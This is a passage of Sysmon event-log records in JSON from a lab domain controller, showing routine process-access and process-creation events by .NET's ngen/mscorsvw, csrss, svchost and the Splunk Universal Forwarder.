4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:40.584","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2290-5F25-0000-001072760F00}","TargetProcessId":"4276","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7879,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:40.584\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2290-5F25-0000-001072760F00}\r\nTargetProcessId: 4276\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:40.584","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2290-5F25-0000-001072760F00}","TargetProcessId":"4276","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7880,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:40.600\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2290-5F25-0000-001072760F00}\r\nTargetProcessId: 4276\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:40.600","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2290-5F25-0000-001072760F00}","TargetProcessId":"4276","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7881,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:40.615\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-227A-5F25-0000-001047B80E00}\r\nTargetProcessId: 1572\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:40.615","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-227A-5F25-0000-001047B80E00}","TargetProcessId":"1572","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7882,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:40.615\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-227A-5F25-0000-001047B80E00}\r\nTargetProcessId: 1572\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:40.615","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-227A-5F25-0000-001047B80E00}","TargetProcessId":"1572","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7883,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:40.631\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2290-5F25-0000-001053790F00}\r\nTargetProcessId: 1572\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:40.631","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2290-5F25-0000-001053790F00}","TargetProcessId":"1572","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":7884,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:40.725\r\nProcessGuid: {41C8662E-2290-5F25-0000-0010657C0F00}\r\nProcessId: 3804\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nFileVersion: 10.0.10011.16384\r\nDescription: SplunkMonNoHandle Control Program\r\nProduct: Windows (R) Win 7 DDK driver\r\nCompany: Windows (R) Win 7 DDK provider\r\nOriginalFileName: SplunkMonNoHandle.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:06:40.725","ProcessGuid":"{41C8662E-2290-5F25-0000-0010657C0F00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","FileVersion":"10.0.10011.16384","Description":"SplunkMonNoHandle Control Program","Product":"Windows (R) Win 7 DDK driver","Company":"Windows (R) Win 7 DDK provider","OriginalFileName":"SplunkMonNoHandle.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:06:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7885,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:40.725\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-2290-5F25-0000-0010657C0F00}\r\nTargetProcessId: 3804\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:40.725","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-2290-5F25-0000-0010657C0F00}","TargetProcessId":"3804","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7886,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:40.725\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2290-5F25-0000-0010657C0F00}\r\nTargetProcessId: 3804\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:40.725","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2290-5F25-0000-0010657C0F00}","TargetProcessId":"3804","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7887,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:40.725\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 